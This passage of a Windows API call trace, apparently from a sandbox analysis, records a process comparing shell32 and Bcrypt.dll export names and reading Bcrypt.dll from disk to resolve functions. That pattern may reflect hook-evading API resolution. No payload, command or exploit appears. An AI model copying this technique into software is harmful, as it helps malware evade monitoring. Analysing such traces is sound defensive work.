(lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0149.024] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0149.024] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.025] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.025] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.148] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.148] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0149.148] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0149.148] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0149.148] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0149.148] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0149.149] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.150] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.150] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.150] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.150] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0149.150] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0149.328] GetProcessHeap () returned 0x520000 [0149.328] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x412d040 | out: hHeap=0x520000) returned 1 [0149.950] GetProcessHeap () returned 0x520000 [0149.950] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5398c0 [0149.950] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0149.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0149.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0149.957] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0149.957] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0149.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0149.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0149.957] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0149.957] GetProcessHeap () returned 0x520000 [0149.957] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x26fa0) returned 0x2d62010 [0149.959] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0149.959] ReadFile (in: hFile=0x15c, lpBuffer=0x2d62010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0149.962] CloseHandle (hObject=0x15c) returned 1 [0149.963] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0149.963] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0149.963] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0149.963] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0149.963] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0149.963] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0149.963] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0149.963] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0149.963] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0149.963] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.963] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0149.964] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0149.964] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0149.964] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.964] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0149.965] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.966] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0149.966] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.967] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0149.968] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0149.969] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0149.969] lstrcmpA 